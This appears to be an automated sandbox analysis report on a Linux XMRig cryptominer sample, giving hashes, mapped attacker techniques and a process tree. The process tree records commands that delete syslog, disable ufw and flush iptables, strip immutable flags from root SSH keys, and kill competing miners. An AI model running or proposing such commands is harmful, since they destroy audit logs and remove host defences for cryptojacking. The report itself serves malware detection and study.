Analysis
-
max time kernel
8s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
29-09-2024 11:33
Static task
static1
Behavioral task
behavioral1
Sample
fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Resource
debian9-mipsel-20240418-en
General
-
Target
fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
-
Size
27KB
-
MD5
fe70c19936ef32efb00f3c75ea90e701
-
SHA1
461514742ae77741e53efb6975ffd8d3db264c92
-
SHA256
7f0e07d0e5f7af973ab0f2768f06c00efb7f37da49fb6939df547d076e2c62d5
-
SHA512
dad1271c0984f3120dc0c35725212fdccf707b4c3e5ecc6b1fe9e5ba95b295398d17fdac46c767375268fb1577128d23aa519ebfabc881a3b11e78de1b6a8f4b
-
SSDEEP
384:G7pQQwQHDf6jlpTWg3vMGQiKMvh/4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdeD:G7JoFNcDvFLcIwgiYq0xzBWjzr2W
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
rmdescription ioc process File deleted /var/log/syslog rm -
Executes dropped EXE 1 IoCs
Processes:
ioc pid process /usr/bin/salt-store 3039 -
Flushes firewall rules 1 TTPs 3 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
Processes:
ufwiptablespid process 1475 ufw 1650 iptables 2980 -
Processes:
modprobeioc pid process /lib/modules/4.15.0-213-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1479 modprobe -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
Processes:
xargsxargsiptablesip6tablesxargsxargsxargsxargsiptablesxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsiptablesxargsxargsxargsxargsxargsiptablesip6tablesxargsxargsxargsiptablesiptablesip6tablesxargsxargsip6tablesip6tablesxargsxargsiptablesxargsxargsxargsxargsxargspid process 2112 xargs 2288 xargs 2577 2946 1525 iptables 2613 2914 1604 ip6tables 2197 xargs 2294 xargs 2482 xargs 2601 2019 xargs 2593 1555 iptables 1768 xargs 1813 xargs 1849 xargs 1929 xargs 3017 1714 xargs 2495 xargs 2545 2565 2573 2009 xargs 2033 xargs 2335 xargs 1934 xargs 1994 xargs 2323 xargs 2519 xargs 1496 iptables 1828 xargs 2048 xargs 2137 xargs 2473 xargs 2377 xargs 2557 1563 iptables 1608 ip6tables 1798 xargs 2144 xargs 2181 xargs 1491 iptables 1526 iptables 1624 ip6tables 2209 xargs 2463 xargs 1612 ip6tables 1636 ip6tables 1904 xargs 2043 xargs 2589 1494 iptables 1699 xargs 1738 xargs 2629 2599 2811 2864 1681 xargs 1818 xargs 1969 xargs -
Creates/modifies Cron job 1 TTPs 22 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
description ioc process File opened for modification /var/spool/cron/crontabs/tmp.MBL5sb File opened for modification /var/spool/cron/crontabs/tmp.S5jaC2 File opened for modification /var/spool/cron/crontabs/tmp.e6QZR7 File opened for modification /var/spool/cron/crontabs/tmp.zGIcM9 File opened for modification /var/spool/cron/crontabs/tmp.JvBX4c File opened for modification /var/spool/cron/crontabs/tmp.Sp02W8 File opened for modification /var/spool/cron/crontabs/tmp.7DCX8c File opened for modification /var/spool/cron/crontabs/tmp.2HMGhf File opened for modification /var/spool/cron/crontabs/tmp.4uFFl1 File opened for modification /var/spool/cron/crontabs/tmp.NHBhW5 File opened for modification /var/spool/cron/crontabs/tmp.F1A5T4 File opened for modification /var/spool/cron/crontabs/tmp.mtUcga File opened for modification /var/spool/cron/crontabs/tmp.ICTYyd File opened for modification /var/spool/cron/crontabs/tmp.7eBEPe File opened for modification /var/spool/cron/crontabs/tmp.PMxtl7 File opened for modification /var/spool/cron/crontabs/tmp.EgAcz6 File opened for modification /var/spool/cron/crontabs/tmp.bZmjOa File opened for modification /var/spool/cron/crontabs/tmp.niRZUf File opened for modification /var/spool/cron/crontabs/tmp.hK50U2 File opened for modification /var/spool/cron/crontabs/tmp.ikzJq5 File opened for modification /var/spool/cron/crontabs/tmp.Uru6m4 File opened for modification /var/spool/cron/crontabs/tmp.jlqbs8 -
Disables AppArmor 28 IoCs
Disables AppArmor security module.
Processes:
pid process 2976 2976 2981 2956 2969 2981 2981 2991 2956 2976 2956 2988 3004 2981 2981 2981 2956 2976 2988 2988 2956 2956 2993 2988 2988 2976 2976 2988 -
Enumerates running processes
Discovers information about currently running processes on the system
-
Write file to user bin folder 2 IoCs
Processes:
description ioc process File opened for modification /usr/bin/salt-store File opened for modification /usr/bin/salt-store -
Changes its process name 1 IoCs
Processes:
description ioc pid process Changes the process name, possibly in an attempt to hide itself (sysv-install) 2973 -
Reads CPU attributes 1 TTPs 64 IoCs
Processes:
pspspspspspskillpspskillpspspspspspspspspspspspspspspspspspspspgreppspspspskilldescription ioc process File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online kill File opened for reading /sys/devices/system/cpu/online -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
Processes:
modprobedescription ioc process File opened for reading /sys/module/ip6_tables/initstate modprobe File opened for reading /sys/module/x_tables/initstate modprobe -
Process Discovery 1 TTPs 64 IoCs
Adversaries may try to discover information about running processes.
Processes:
pspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspspid process 1814 ps 2188 ps 2336 ps 2283 ps 1955 ps 2000 ps 2039 ps 2133 ps 1880 ps 1900 ps 2066 ps 2378 ps 1668 ps 1905 ps 1975 ps 2342 ps 2198 ps 2354 ps 1829 ps 1834 ps 1980 ps 2166 ps 1860 ps 2216 ps 2076 ps 2108 ps 2256 ps 2313 ps 1890 ps 2044 ps 2118 ps 2251 ps 1915 ps 1940 ps 2020 ps 2025 ps 2261 ps 1809 ps 1910 ps 1930 ps 2010 ps 2277 ps 2348 ps 2005 ps 2034 ps 2171 ps 2231 ps 1970 ps 2098 ps 2271 ps 1799 ps 1945 ps 1990 ps 2123 ps 3008 2151 ps 2307 ps 2360 ps 2384 ps 1804 ps 1895 ps 2049 ps 2399 ps 2103 ps -
Processes:
pspspspspspspspspspspkillpspspspspspspspspspspspspspspgreppspspspspspspspspspsdescription ioc process File opened for reading /proc/84/cmdline File opened for reading /proc/451/cmdline ps File opened for reading /proc/36/cmdline ps File opened for reading /proc/1326/status ps File opened for reading /proc/538/stat ps File opened for reading /proc/1066/cmdline ps File opened for reading /proc/484/cmdline ps File opened for reading /proc/1135/status ps File opened for reading /proc/13/stat ps File opened for reading /proc/538/cmdline File opened for reading /proc/32/stat ps File opened for reading /proc/25/status ps File opened for reading /proc/492/cmdline pkill File opened for reading /proc/1469/status ps File opened for reading /proc/6/cmdline ps File opened for reading /proc/24/stat ps File opened for reading /proc/455/status File opened for reading /proc/1182/stat ps File opened for reading /proc/1155/cmdline File opened for reading /proc/484/status File opened for reading /proc/78/status ps File opened for reading /proc/1096/status File opened for reading /proc/1073/status ps File opened for reading /proc/1154/stat ps File opened for reading /proc/1086/cmdline ps File opened for reading /proc/1066/stat ps File opened for reading /proc/1140/stat ps File opened for reading /proc/1326/status ps File opened for reading /proc/1137/status ps File opened for reading /proc/18/cmdline ps File opened for reading /proc/1073/stat ps File opened for reading /proc/1144/status File opened for reading /proc/592/status File opened for reading /proc/1169/status File opened for reading /proc/416/status File opened for reading /proc/164/cmdline ps File opened for reading /proc/11/stat ps File opened for reading /proc/1179/cmdline ps File opened for reading /proc/437/status pgrep File opened for reading /proc/334/status File opened for reading /proc/27/cmdline ps File opened for reading /proc/443/stat ps File opened for reading /proc/1132/status File opened for reading /proc/492/cmdline File opened for reading /proc/592/status File opened for reading /proc/451/cmdline File opened for reading /proc/159/stat File opened for reading /proc/1171/stat ps File opened for reading /proc/1279/status File opened for reading /proc/1466/cmdline File opened for reading /proc/1057/status ps File opened for reading /proc/521/status ps File opened for reading /proc/1115/cmdline ps File opened for reading /proc/23/status File opened for reading /proc/1151/cmdline File opened for reading /proc/7/status ps File opened for reading /proc/172/cmdline ps File opened for reading /proc/36/stat ps File opened for reading /proc/6/stat ps File opened for reading /proc/81/status File opened for reading /proc/83/status File opened for reading /proc/2579/cmdline File opened for reading /proc/1157/cmdline File opened for reading /proc/940/status ps -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
modprobegrepgrepgreppid process 1479 modprobe 1992 grep 2022 grep 2243 grep 2773 -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118description ioc process File opened for modification /tmp/log_rot fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118
Processes
-
/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes118/tmp/fe70c19936ef32efb00f3c75ea90e701_JaffaCakes1181⤵
- Writes file to tmp directory
PID:1471 -
/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:1472 -
/usr/bin/chattrchattr -iua /tmp/2⤵PID:1473
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵PID:1474
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:1475 -
/sbin/iptables/sbin/iptables -V3⤵PID:1476
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1477
-
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1478
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
- System Network Configuration Discovery
PID:1479 -
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1483
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1486
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1487
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1488
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1489
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1490
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1491 -
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1492
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1493
-
/sbin/iptablesiptables -F ufw-after-input4⤵
- Attempts to change immutable files
PID:1494 -
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1495
-
/sbin/iptablesiptables -F ufw-before-input4⤵
- Attempts to change immutable files
PID:1496 -
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:1497
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1498
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1499
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1500
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1501
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1502
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1503
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1504
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1505
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1506
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1507
-
/sbin/iptablesiptables -F ufw-track-input4⤵PID:1508
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1509
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1510
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1511
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1512
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1513
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1514
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1515
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1516
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1517
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1518
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1519
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:1520
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1521
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1522
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1523
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1524
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
- Attempts to change immutable files
PID:1525 -
/sbin/iptablesiptables -Z ufw-after-input4⤵
- Attempts to change immutable files
PID:1526 -
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1527
-
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:1528
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:1529
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1530
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1531
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1532
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1533
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1534
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1535
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1536
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1537
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1538
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1542
-
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1543
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1544
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1545
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1546
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1547
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1548
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1549
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1550
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1551
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1552
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1553
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1554
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:1555 -
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1556
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1557
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1558
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1559
-
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1560
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1561
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1562
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1563 -
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1564
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1565
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1566
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1567
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1568
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1569
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1570
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1571
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:1572
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1573
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1574
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1575
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1576
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:1577
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:1578
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1579
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1580
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1581
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1582
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1583
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1584
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1585
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1586
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1587
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1588
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1589
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1590
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1591
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1592
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1593
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1594
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1595
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1596
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1597
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1598
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1599
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1600
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1601
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1602
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1603
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:1604 -
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1605
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1606
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1607
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
- Attempts to change immutable files
PID:1608 -
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:1609
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1610
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1611
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
- Attempts to change immutable files
PID:1612 -
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1613
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1614
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1615
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1616
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1617
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1618
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1619
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1620
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1621
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1622
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1623
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
- Attempts to change immutable files
PID:1624 -
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1625
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1626
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1627
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1628
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1629
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1630
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1631
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1632
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1633
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1634
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1635
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:1636 -
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1637
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1638
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1639
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1640
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1641
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1642
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1643
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1644
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1645
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1646
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1647
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1648
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1649
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
PID:1650 -
/usr/bin/sudosudo sysctl "kernel.nmi_watchdog=0"2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1651 -
/usr/sbin/userdeluserdel akay2⤵PID:1655
-
/usr/sbin/userdeluserdel vfinder2⤵PID:1659
-
/usr/bin/chattrchattr -iae /root/.ssh/2⤵PID:1660
-
/usr/bin/chattrchattr -iae /root/.ssh/authorized_keys2⤵PID:1664
-
/bin/rmrm -rf "/tmp/addres*"2⤵PID:1665
-
/bin/rmrm -rf "/tmp/walle*"2⤵PID:1666
-
/bin/rmrm -rf /tmp/keys2⤵PID:1667
-
/bin/grepgrep -i "[a]liyun"2⤵PID:1669
-
/bin/psps aux2⤵
- Process Discovery
PID:1668 -
/bin/grepgrep -i "[y]unjing"2⤵PID:1671
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1670 -
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1675
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1674
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1676
-
/bin/grepgrep 185.71.65.2382⤵PID:1673
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1681 -
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1680
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1679
-
/bin/grepgrep 140.82.52.872⤵PID:1678
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1687
-
/bin/grepgrep -v -2⤵PID:1686
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1685
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1684
-
/bin/grepgrep :4432⤵PID:1683
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1693
-
/bin/grepgrep -v -2⤵PID:1692
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1691
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1690
-
/bin/grepgrep :232⤵PID:1689
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1699 -
/bin/grepgrep -v -2⤵PID:1698
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1697
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1696
-
/bin/grepgrep :4432⤵PID:1695
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1706
-
/bin/grepgrep -v -2⤵PID:1705
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1704
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1703
-
/bin/grepgrep :1432⤵PID:1702
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1714 -
/bin/grepgrep -v -2⤵PID:1713
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1712
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1711
-
/bin/grepgrep :22222⤵PID:1710
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1720
-
/bin/grepgrep -v -2⤵PID:1719
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1718
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1717
-
/bin/grepgrep :33332⤵PID:1716
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1726
-
/bin/grepgrep -v -2⤵PID:1725
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1724
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1723
-
/bin/grepgrep :33892⤵PID:1722
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1732
-
/bin/grepgrep -v -2⤵PID:1731
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1730
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1729
-
/bin/grepgrep :44442⤵PID:1728
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1738 -
/bin/grepgrep -v -2⤵PID:1737
-
